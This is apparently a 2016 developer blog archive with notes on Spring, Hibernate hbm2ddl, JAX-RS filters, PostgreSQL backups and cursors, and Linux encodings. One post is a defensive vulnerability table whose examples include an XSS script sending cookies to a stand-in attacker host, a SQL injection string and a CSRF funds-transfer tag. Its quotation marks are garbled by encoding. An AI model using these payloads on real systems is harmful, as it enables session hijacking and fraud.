This doesn't return the smallest value of the list. It returns the index of the first occurence of the smallest value
Sunday, July 31, 2016
Friday, July 29, 2016
Spring boot, Spring security and rest
- Exploring Spring-Boot and Spring-Security: Custom token based authentication of REST services with Spring-Security and pinch of Spring Java Configuration and Spring Integration Testing.
- Spring Boot: Authentication with custom http header.
- http://docs.spring.io/spring-security/site/docs/current/reference/html/headers.html
- Spring Boot with oauth2
- http://stackoverflow.com/users/1259109/dave-syer
- http://spring.io/team/dsyer
Monday, July 25, 2016
Hibernate's hbm2ddl Tool
The Hibernate hbm2ddl is a tool allows us to create, update, and validate a database schema using Hibernate mappings configuration. The .hbm files are Hibernate mapping files, but since the schema export/validation is done using the the internal configuration Hibernate creates for the entities mapping, we can use still use hbm2ddl when working with JPA. As usual in here I write about the JPA environment, just remember that the hbm2ddl can also be invoked from command line or using Ant task.
Setup
To invoke Hibernates hbm2ddl during the creation of the entity manager factory set the 'hibernate.hbm2ddl.auto' property to one of
Setup
To invoke Hibernates hbm2ddl during the creation of the entity manager factory set the 'hibernate.hbm2ddl.auto' property to one of
· create
· create-drop
· update
· validate
Here is an example:<persistence> <persistence-unit name="sampleContext" transaction-type="RESOURCE_LOCAL"> <provider>org.hibernate.ejb.HibernatePersistence</provider> <properties> <property name="hibernate.connection.driver_class" value="org.apache.derby.jdbc.ClientDriver"> <property name="hibernate.connection.username" value="app"> <property name="hibernate.connection.password" value="app"> <property name="hibernate.connection.url" value="jdbc:derby://localhost:1527/HibernateTestDB;create=true"> <property name="hibernate.hbm2ddl.auto" value="validate"> </properties> </persistence-unit> </persistence>
The Options and Their Meanings
create
Hibernate will create the database when the entity manager factory is created (actually when Hibernate's SessionFactory is created by the entity manager factory). If a file named import.sql exists in the root of the class path ('/import.sql') Hibernate will execute the SQL statements read from the file after the creation of the database schema. It is important to remember that before Hibernate creates the schema it empties it (delete all tables, constraints, or any other database object that is going to be created in the process of building the schema).
create-drop
Same as 'create' but when the entity manager factory (which holds the SessionFactory) is explicitly closed the schema will be dropped.
update
Hibernate creates an update script trying to update the database structure to the current mapping. Does not read and invoke the SQL statements from import.sql. Useful, but we have to be careful, not all of the updates can be done performed ? for example adding a not null column to a table with existing data.
validate
Validates the existing schema with the current entities configuration. When using this mode Hibernate will not do any changes to the schema and will not use the import.sql file.
Mode
|
Reads
import.sql
|
Alters Database
Structure
|
Comments
|
update |
No
|
Yes
| |
create |
Yes
|
Yes
| Empties the database before creating it |
create-drop |
Yes
|
Yes
| Drops the database when the SessionFactory is closed |
validate |
No
|
No
|
Resource Link:
- http://learningviacode.blogspot.ro/2011/09/hibernatehbm2ddlauto-2.html
- http://blog.eyallupu.com/2007/05/hibernates-hbm2ddl-tool.html
Conditional JAX-RS filter
JAX-RS has the notion of a
DynamicFeature
: this is a feature that is decided on a per-resource-method basis. This means that we can fine tune the behavior of the application based on each REST endpoint/method. Imagine the following use case: you have a multi tenant system and you want to create a filter that blocks incoming requests if they don't provide the tenant information. By default, all endpoints require a tenant. But there are some endpoints or methods that don't require this tenant information. Instead of building a generic filter that will be processed for all incoming requests, you can just create an annotation and mark the places you don't want the filter to run.
First, your
DynamicFeature
needs to implement the configure(ResourceInfo, FeatureContext)
method, like this:@Provider
public class TenantFeature implements DynamicFeature {
private static final TenantFilter TENANT_FILTER = new TenantFilter();
@Override
public void configure(ResourceInfo resourceInfo, FeatureContext context) {
Class<?> resourceClass = resourceInfo.getResourceClass();
Method method = resourceInfo.getResourceMethod();
boolean required = true;
if (resourceClass.isAnnotationPresent(TenantRequired.class)) {
required = resourceClass.getAnnotation(TenantRequired.class).value();
}
if (method.isAnnotationPresent(TenantRequired.class)) {
required = method.getAnnotation(TenantRequired.class).value();
}
if (required) {
context.register(TENANT_FILTER);
}
}
}
Then our actual filter. Note that this is not marked with
@Provider
, as we don't want this applied to all resources discovered by the JAX-RS implementation.public class TenantFilter implements ContainerRequestFilter {
private static final String TENANT_HEADER_NAME = "Tenant";
private static final String MESSAGE = String.format("The HTTP header %s has to be provided.", TENANT_HEADER_NAME);
private static final Response BAD_REQUEST_MISSING_TENANT = Response
.status(Response.Status.BAD_REQUEST)
.entity(MESSAGE)
.build();
@Override
public void filter(ContainerRequestContext requestContext) throws IOException {
String headerValue = requestContext.getHeaderString(TENANT_HEADER_NAME);
if (null == headerValue || headerValue.isEmpty()) {
requestContext.abortWith(BAD_REQUEST_MISSING_TENANT);
}
}
And finally, the annotation we'll use to mark the parts we don't want the filter to run on. Note that the default value is set to
true
.@Retention(RUNTIME)
@Target({METHOD, TYPE})
public @interface TenantRequired {
@Nonbinding
boolean value() default true;
}
Our business code would look like this. For all non-annotated methods/classes, the filter runs on. So,
GET /foo
requires our tenant header, whereas a POST /foo
doesn't.@Path("/foo")
public class FooEndpoint {
@GET
public Response getFoo() {
return Response.ok("bar").build();
}
@TenantRequired(false)
@POST
public Response getFooWithoutTenant() {
return Response.ok("bar").build();
}
}
Or we could mark the entire endpoint as not requiring a tenant:
@Path("no-tenant")
@TenantRequired(false)
public class FooNoTenantEndpoint {
@GET
public Response getFoo() {
return Response.ok("bar").build();
}
}
Resource Link: https://blog.kroehling.de/conditional-jax-rs-filter/
Backup and restore in Postgresql using various ways
9 ways to backup and restore in Postgresql
Following are some of the commands I use to backup and restore my postgres databases and tables.
- pg_dump is a nifty utility designed to output a series of SQL statements that describes the schema and data of your database. You can control what goes into your backup by using additional flags.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb > backup.sql
Restore: psql -h localhost -p 5432 -U postgres -d mydb < backup.sql-h is for host.
-p is for port.
-U is for username.
-d is for database. - Single transaction restore:
you can use –single-transaction in your restore command. It wraps out entire restore operation in one transaction, if something goes wrong it rollbacks all the changes.
psql –single-transaction -h localhost -p 5432 -U postgres -d mydb < backup.sql - Compressed Backup:
If your backup is too big, you can use any compression utility to compress it. I prefer gzip.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb | gzip > backup.gz
Restore: gunzip -c backup.gz | psql -h localhost -p 5432 -U postgres -d mydb - Split Backup file:
If you are going to email your backup files or transfer them via any medium on internet I will suggest splitting the files into short files. You can use split utility for splitting the files with a size limit. In the example I am usinf 2mb size limit.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb | split -b 2m – backup.sql
Restore: cat backup.sql* | psql -h localhost -p 5432 -U postgres -d mydb - Split compressed Backup file:
This is just a combination of point 3 and 4. We first compress the file then split it instead of splitting the plain file.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb | gzip | split -b 1m – backup.gz
Restore: cat backup.gz* | gunzip | psql -h localhost -p 5432 -U postgres -d mydb - Parallel Backup:
You can allow pg_dump to dump the backup data in parallel by including the -j flag. It tells pg_dump the number of tables it can dump in parallel. Parallel backup only works when you use more than one files for writing backup data hence directory. -F d sets the format to directory and -f provides the directory name.
Backup: pg_dump -F d -f backup -j 20 -h localhost -p 5432 -U postgres -d mydb
Restore: pg_restore -F d -j 20 -h localhost -p 5432 -U postgres -d mydb backup - Backup of a specific table:
You can take backup of a specify table by adding -t flag.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb -t my_table > backup.sql
Restore: psql -h localhost -p 5432 -U postgres -d mydb < backup.sql - Take Backup of all databases:
pg_dumpall is used to take backup of all of your postgresql database. I think it is just a wrapper around pg_dump. It will ask password for every database.
Backup: pg_dumpall -h localhost -p 5432 -U postgres > backup.sql
Restore: psql -h localhost -p 5432 -U postgres < backup.sql - Custom format backup (-F c):
Keith mentioned in the comment that -F c provides better options at the time of restoring the backup. You can take the backup of whole database and restore only selected tables by using -t flag. It also compresses the backup data for you.All these feature are also provided by the directory format (-F d) too. The main difference between directory and custom format is that custom format generates a single file and directory format generates a directory full of files. A Single file(single stream) gives us many advantages like outputting the backup data over SSH or transferring it to some other service is easy compared to a directory(multiple stream)One more difference is that you can not use parallel backup option (-j) with custom format backup. It is obvious since it uses only one stream.So how do you take backup using custom format and restore it.Backup: pg_dump -F c -h localhost -p 5432 -U postgres -d mydb > backup.dat
Restore: pg_restore -F c -h localhost -p 5432 -U postgres -t my_table -d mydb backup.dat
some other useful flags in pg_dump.
-v, –verbose verbose mode
-V, –version output version information, then exit
-?, –help show this help, then exit
-a, –data-only dump only the data, not the schema
-b, –blobs include large objects in dump
-c, –clean clean (drop) database objects before recreating
-C, –create include commands to create database in dump
-E, –encoding=ENCODING dump the data in encoding ENCODING
-n, –schema=SCHEMA dump the named schema(s) only
-N, –exclude-schema=SCHEMA do NOT dump the named schema(s)
-o, –oids include OIDs in dump
-O, –no-owner skip restoration of object ownership in plain-text format
-s, –schema-only dump only the schema, no data
-S, –superuser=NAME superuser user name to use in plain-text format
-t, –table=TABLE dump the named table(s) only
-T, –exclude-table=TABLE do NOT dump the named table(s)
-x, –no-privileges do not dump privileges (grant/revoke)
-V, –version output version information, then exit
-?, –help show this help, then exit
-a, –data-only dump only the data, not the schema
-b, –blobs include large objects in dump
-c, –clean clean (drop) database objects before recreating
-C, –create include commands to create database in dump
-E, –encoding=ENCODING dump the data in encoding ENCODING
-n, –schema=SCHEMA dump the named schema(s) only
-N, –exclude-schema=SCHEMA do NOT dump the named schema(s)
-o, –oids include OIDs in dump
-O, –no-owner skip restoration of object ownership in plain-text format
-s, –schema-only dump only the schema, no data
-S, –superuser=NAME superuser user name to use in plain-text format
-t, –table=TABLE dump the named table(s) only
-T, –exclude-table=TABLE do NOT dump the named table(s)
-x, –no-privileges do not dump privileges (grant/revoke)
References
Restful Web Services: Tutorial
- Spring MVC 4 RESTFul Web Services CRUD Example+RestTemplate
- What exactly is RESTful programming?
- Building REST APIs With Spring Boot
- Post JSON to spring REST webservice
- steps toward the glory of REST
- Spring Data JPA - Reference Documentation
- http://www.drdobbs.com/web-development/restful-web-services-a-tutorial/240169069
Friday, July 22, 2016
Security vulnerabilities in java-based web applications
Web Attack methods
Security Vulnerability | What is it? | Example Attack Scenario | Prevention |
Cross-Site Scripting (XSS) | Cross-Site Scripting(XSS) flaws occur if application takes non-trusted data & pass it to browser without suitable validations/escaping. It allows an attacker to run malicious scripts in the hostfs browser. Possible problems could be hijacking user sessions, defacing web sites, invalid redirects & forwards. | Hacker
might utilize malicious data in developing following HTML code
without validation or escaping: (String) page += h <input name=fmyaccountnamef type=fTEXTf value=fh + request.getParameter(gFFh) + ge>h; The eve-dropper changes the eFFf parameter in their browser to: <script>document.location= ehttp://www.hacker.com/ cgi-bin /cookie.cgi?param=f +document.cookie</script>f. This will permit transferring of victimfs session ID to hackerfs site and thus they can misuse it for access. |
1.
Escape all input data 2. Strong Input Validation where it decodes all encoded information. |
Using Modules with known vulnerabilities | Software components like frameworks, libraries and other modules usually run with full privileges. Such software may undermine its defences and allows a range of possible impacts or attacks. | Misuse of the Expression Language (EL) in Spring based web application permits hackers to run arbitrary code, leads to unauthorized access. | 1.
Identify dependent components. 2. Monitor security of used components in version & public listings. 3. Develop security policies. |
SQL Injections | It is a coding way, used to hack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. | The
software uses malicious data in developing the below suspicious SQL
query: String query = gSELECT * FROM branches WHERE branchID=fh + request.getParameter(gnameh) + geh; Eve-dropper can change this name parameter and append e or e1f=f1 which alters query and enables fetching of all records. |
1.
Use Prepared Statements in queries & procedures 2. Escaping input given by user especially those with special character |
Missing Function Level Access Control | Usually function level access rights got verified which permits that functionality to appear in the UI. Also, similar access control checks are done on the server when each function is accessed. Hackers will forge requests in order to access functionality without legal authorization, if requests are not checked. | The
attacker simply forces browser to hit target URLs. Say the below URLs
require authentication and admin rights are also required for access
to admin_getAppAccess page http://myweb.com/appl/getAppAccess http://myweb.com/appl/admin_getAppAccess . If a non-admin unauthenticated user can access either page, thatfs a flaw |
1.
Access Control for business processes. 2. Role based authorization for every operation. 3. Restricted Access to File Management. |
Sensitive Data Exposure | Sometimes web portals fail to properly save sensitive data like account details, authentication credentials. Hacker might steal/change such less protected information to conduct crimes like debit card fraud,identity theft. Sensitive information needs more care like encryption at rest or in transit and special precautions when exchanged with the browser | A webpage simply doesnft use SSL for every authenticated page. Attacker simply observes network traffic (say an open wireless network), and steals the userfs cookie of its session. Eve-dropper then replays such cookie and hijacks the userfs session, accessing the customerfs private information. | 1.
Donft save sensitive data unnecessarily 2. Check whether passwords are saved with algorithm specifically designed for its protection 3. Stop auto-complete on screens & caching on forms collecting sensitive data |
Cross-Site Request Forgery (CSRF) | CSRF is a problem which allows a logged-on victimfs browser to make a forged HTTP request alongwith the victimfs session cookie with any other automatically included access information to a vulnerable web application. This permits the hacker to force the victimfs browser to generate requests the vulnerable application thinks as legal requests arising via the victimfs end | Application
permits user to send a state changing request :
http://myweb/app/sendFunds?amount=9880&targetAct=4673892
Thus the eve-dropper develops a request to enable money transfer from
the victimfs account to that eve-dropper
as embeds into image or iframe. <img src= ghttp://myweb/app/sendFunds ?amount=9880&targetAct=hackerAcct#h /> If any such website got traversed while already authenticated to this website, any forged requests will have session info, inadvertently authorizing the request. |
1.
Incorporate a unique token within hidden field or URL. 2. Origin and Referrer Header are verified. 3. Captcha can be incorporated |
Insecure Direct Object References | It
occurs when a programmer exposes a direct/indirect reference to an
internal implementation object, like a folder, file, or database key. If no access-control checks and other protection, then hackers can modify these references to access unauthorized information. |
If
application utilized unverified data in a SQL query: String query = gSELECT * FROM myacts WHERE accntNo = ?h; PreparedStatement pstmt =connection.prepareStatement(query , c ); pstmt.setString( 1, request.getParameter(gacnumberh)); ResultSet results = pstmt.executeQuery( ); The attacker simply modifies the eacnumberf parameter. http://myweb.com/app/info?acct=notuseraccount |
1.
Use per user or per session indirect object references: For instance, a list of 4 resources could use the keys 1 to 4 to indicate value the user can choose, instead of referring by resourcefs name. 2. Check access for request |
Invalidated Redirects & Forwards | Web sites usually redirect and forward users to other webpages and sites, and use malicious data to know the destination pages. Without suitable validation checks, eve-dropper can redirect victims to phishing/malware websites, or use forwards to access illegal pages. | Suppose
a page called gredirect.jsph exists in application which had a single
parameter named gurlh. Eve-dropper would develop a untrusted URL
which redirects users to a non-trusted site. http://www.myweb.com/redirect.jsp?url=hack.com |
1.
The implementation is reviewed for all uses of forward or redirect. 2. Check the application and detect whether if it makes redirects |
Security Misconfiguration | Proper security needs to have a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Like secure and robust configuration settings should be defined, implemented, and maintained, as default configurations are often easily attacked. Also, software should be up to date. | For instance, admin console of app server is automatically installed and not removed. Default accounts remain same. Hacker finds the standard admin pages are on your server, logs in with default key/passwords, and takes over access. | 1.
Hardening process needs to be repeated. 2. Architecture of product should be strong with loose coupling and tight security among modules. |
Broken Authentication & Session Management | Application functions in relation with authentication and session management are often not properly implemented as expected, permitting hackers to assume other usersf identities by compromising keys, passwords or session tokens, or to exploit other implementation flaws. | For
instance, Hotel reserving application supports URL rewriting,
embedding session IDs in the URL: http://myweb.com/list/ jsessionid= 2K0OC2PNPOLCDSN2JV?dest=Goa A legal user of the site wants to let his colleagues know about the purchases. The above link if e-mailed then without being aware of the fact that he is also giving away his session ID. When his colleagues use the link they will use his session and debit card. |
1.
Hard authorization and session management checks 2. Prevent cross site scripting flaws which further prevents stealing of session-id 3. Use SSL |
Resource Link: Security
vulnerabilities in java-based web applications
Thursday, July 21, 2016
Function writing using postgresql
- http://www.postgresonline.com/journal/archives/58-Quick-Guide-to-writing-PLPGSQL-Functions-Part-1.html
- http://www.postgresonline.com/journal/archives/76-Quick-Guide-to-writing-PLPGSQL-Functions-Part-2.html
- http://www.postgresqltutorial.com/postgresql-create-function/
- https://www.postgresql.org/docs/9.2/static/plpgsql-cursors.html
- https://www.postgresql.org/docs/9.1/static/plpgsql-declarations.html
- https://www.postgresql.org/docs/9.1/static/plpgsql-porting.html
- http://www.sqlines.com/postgresql/stored_procedures_functions
- https://wiki.postgresql.org/wiki/Return_more_than_one_row_of_data_from_PL/pgSQL_functions
Postgresql Cursor: How cursor works in function of postgresql?
Summary: in this tutorial, we will show you how to use PL/pgSQL Cursor and give you some practical examples of using cursors.
A PL/pgSQL cursor allows us to encapsulate a query and process each individual row at a time. We use cursors when we want to divide a large result set into parts and process each part individually. If we process it at once, we may have a memory overflow error.
In addition, we can develop a function that returns a reference to a cursor. This is an efficient way to return a large result set from a function. The caller of the function can process the result set based on the cursor reference.
The following diagram illustrates how to use a cursor in PostgreSQL:
PL/pgSQL Cursor
- First, declare a cursor.
- Next, open the cursor.
- Then, fetch rows from the result set into a target.
- After that, check if there is more row left to fetch. If yes, go to step 3, otherwise go to step 5.
- Finally, close the cursor.
Declaring cursors
To access to a cursor, you need to declare a cursor variable at the declaration section of a block. PostgreSQL provides us with a special type called REFCURSOR to declare a cursor variable.
DECLARE
my_cursor REFCURSOR;
Another way to declare a cursor that bounds to a query is using the following syntax:
cursor_name [ [NO] SCROLL ] CURSOR [( name datatype, name data type, ...)] FOR query;
First, you specify a variable name for the cursor.
Next, you specify whether the cursor can be scrolled backward using the SCROLL. If you use NO SCROLL, the cursor cannot be scrolled backward.
Then, you put the CURSOR keyword followed by a list of comma-separated arguments ( name datatype) that defines parameters for the query. These arguments will be substituted by values when the cursor is opened.
After that, you specify a query following the FOR keyword. You can use any valid SELECT statement here.
The following example illustrates how to declare cursors:
DECLARE
cur_films CURSOR FOR SELECT * FROM film;
cur_films2 CURSOR (year integer) FOR SELECT * FROM film WHERE release_year = year;
The cur_films is a cursor that encapsulates all rows in the film table.
The cur_films2 is a cursor that encapsulates film with a particular release year in the film table.
Opening cursors
Cursors must be opened before they can be used to query rows. PostgreSQL provides syntax for opening an unbound and bound cursors.Opening unbound cursors
We open an unbound cursor using the following syntax:OPEN unbound_cursor_variable [ [ NO ] SCROLL ] FOR query;
Because unbound cursor variable is not bounded to any query when we declared it, we have to specify the query when we open it. See the following example:
OPEN my_cursor FOR SELECT * FROM city WHERE counter = p_country;
PostgreSQL allows us to open a cursor and bound it to a dynamic query. Here is the syntax:
OPEN unbound_cursor_variable[ [ NO ] SCROLL ]
FOR EXECUTE query_string [USING expression [, ... ] ];
In the following example, we build a dynamic query that sorts rows based on a sort_field parameter, and open the cursor that executes the dynamic query.
query := 'SELECT * FROM city ORDER BY $1';
OPEN cur_city FOR EXECUTE query USING sort_field;
Opening bound cursors
Because a bound cursor already bounds to a query when we declared it, so when we open it, we just need to pass the arguments to the query if necessary.OPEN cursor_variable[ (name:=value,name:=value,...)];
In the following example, we open bound cursors cur_films and cur_films2 that we declared above:
OPEN cur_films;
OPEN cur_films2(year:=2005);
Using cursors
After opening a cursor, we can manipulate it using FETCH, MOVE, UPDATE, or DELETE statement.
Fetching the next row
FETCH [ direction { FROM | IN } ] cursor_variable INTO target_variable;The FETCH statement gets the next row from the cursor and assign it a target_variable, which could be a record, a row variable, or a comma-separated list of variables. If no more row found, the target_variable is set to NULL(s).
By default, a cursor gets the next row if you don’t specify the direction explicitly. The following is the valid for the cursor:
- NEXT
- LAST
- PRIOR
- FIRST
- ABSOLUTE count
- RELATIVE count
- FORWARD
- BACKWARD
See the following examples of fetching cursors.
FETCH cur_films INTO row_film;
FETCH LAST FROM row_film INTO title, release_year;
Moving the cursor
MOVE [ direction { FROM | IN } ] cursor_variable;
If you want to move the cursor only without retrieving any row, you use the MOVE statement. The direction accepts the same value as the FETCH statement.
MOVE cur_films2;
MOVE LAST FROM cur_films;
MOVE RELATIVE -1 FROM cur_films;
MOVE FORWARD 3 FROM cur_films;
Deleting or updating row
Once a cursor is positioned, we can delete or update row identifying by the cursor using DELETE WHERE CURRENT OF or UPDATE WHERE CURRENT OF statement as follows:UPDATE table_name
SET column = value, ...
WHERE CURRENT OF cursor_variable;
DELETE FROM table_name
WHERE CURRENT OF cursor_variable;
See the following example.
UPDATE film SET release_year = p_year
WHERE CURRENT OF cur_films;
Closing cursors
To close an opening cursor, we use CLOSE statement as follows:CLOSE cursor_variable;
The CLOSE statement releases resources or frees up cursor variable to allow it to be opened again using OPEN statement.
PL/pgSQL cursors – putting it all together
The following get_film_titles(integer) function accepts an argument that represents the release year of a film. Inside the function, we query all films whose release year equals to the released year passed to the function. We use the cursor to loop through the rows and concatenate the title and release year of film that has the title contains the ful word.CREATE OR REPLACE FUNCTION get_film_titles(p_year INTEGER)
RETURNS text AS $$
DECLARE
titles TEXT DEFAULT '';
rec_film RECORD;
cur_films CURSOR(p_year INTEGER)
FOR SELECT
FROM film
WHERE release_year = p_year;
BEGIN
-- Open the cursor
OPEN cur_films(p_year);
LOOP
-- fetch row into the film
FETCH cur_films INTO rec_film;
-- exit when no more row to fetch
EXIT WHEN NOT FOUND;
-- build the output
IF rec_film.title LIKE '%ful%' THEN
titles := titles || ',' || rec_film.title || ':' || rec_film.release_year;
END IF;
END LOOP;
-- Close the cursor
CLOSE cur_films;
RETURN titles;
END; $$
LANGUAGE plpgsql;
SELECT get_film_titles(2006);
,Grosse Wonderful:2006,Day Unfaithful:2006,Reap Unfaithful:2006,Unfaithful Kill:2006,Wonderful Drop:2006
In this tutorial, we have shown you how to work with PL/pgSQL cursor to loop through a set of rows and process each row individually.
Resource Link:
Wednesday, July 20, 2016
How to change character encoding of a text file on Linux
http://ask.xmodulo.com/change-character-encoding-text-file-linux.html
Step One
Step Two
Step
Three
http://stackoverflow.com/questions/5306153/how-to-get-terminals-character-encoding
For checking current charset
[user@ip-192-191-181-181 java]$ echo $LANG
ja_JP.UTF-8
For checking current encoding
[user@ip-192-191-181-181 java]$ locale charmap
UTF-8
For current encoding:
locale charmap
For available locales:
locale -a
For available encodings:
locale -m
Questions:
- How can I know which character encoding a certain text file is using?
- How can I convert it to some other encoding of my choosing?
Step One
In order
to find out the character encoding of a file, we will use a commad-line tool
called file.
Since the filecommand
is a standard UNIX program, we can expect to find it in all modern Linux
distros.
Run the following command:
$ file
--mime-encoding filename
Step Two
The next
step is to check what kinds of text encodings are supported on your Linux
system. For this, we will use a tool called iconv with the
"-l" flag (lowercase L), which will list all the currently supported
encodings.
$
iconv -l
The iconv utility
is part of the the GNU libc libraries,
so it is available in all Linux distributions out-of-the-box.
Step
Three
Once we have selected a target encoding among those supported on
our Linux system, let's run the following command to perform the conversion:
$
iconv -f old_encoding -t new_encoding filename
For example, to convert iso-8859-1 to utf-8:
$
iconv -f iso-8859-1 -t utf-8 input.txt
Knowing how to use these tools together as we have demonstrated,
you can for example fix a broken subtitle file:
Subscribe to:
Posts (Atom)